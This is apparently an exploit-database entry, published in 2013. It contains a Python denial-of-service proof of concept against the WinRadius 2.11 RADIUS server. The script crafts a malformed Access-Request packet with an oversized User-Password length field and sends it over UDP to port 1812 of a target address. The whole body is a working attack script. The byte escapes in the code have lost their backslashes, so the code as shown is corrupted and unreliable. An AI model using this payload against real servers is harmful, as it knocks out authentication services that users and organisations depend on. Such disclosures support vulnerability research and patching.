WinRadius 2.11 - Denial of Service

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WinRadius 2.11 - Denial of Service
# Published : 2013-06-11
# Author :
# Previous Title : WPS Office Wpsio.dll - Stack Buffer Overflow Vulnerability
# Next Title : Realtek Sound Manager AvRack (.wav) - Crash PoC

#!/usr/bin/python


#Exploit Title: WinRadius 2.11 DoS
#Date: 10th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-winradius-2-11/
#Vendor Homepage: [ADVERT HOLDING PAGE] http://www.itconsult2000.com/
#Software Link: http://download.cnet.com/WinRadius/3000-2085_4-10131429.html
#Version: 2.2
#Tested on: Windows XP SP3 English
#Exploit-DB Note: Read author's write-up

from socket import *
import sys
import select

pwn =  "x01" #Code 01
pwn += "xff" #packet identifier
pwn += "x00x2c" #len 44
pwn += "xd1x56x8ax38xfbxeax4ax40xb7x8axa2x7ax8fx3exaex23" #authenticator
pwn += "x01" #t=User-Name(1)
pwn += "x06" #avp: l=6
pwn += "x61x64x61x6d" #adam

pwn += "x02" #avp t=User-Password(2)
pwn += "xff" #avp: l=18 
pwn += "xf0x13x57x7ex48x1ex55xaax7dx29x6dx7ax88x18x89x21" #password (enc)

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)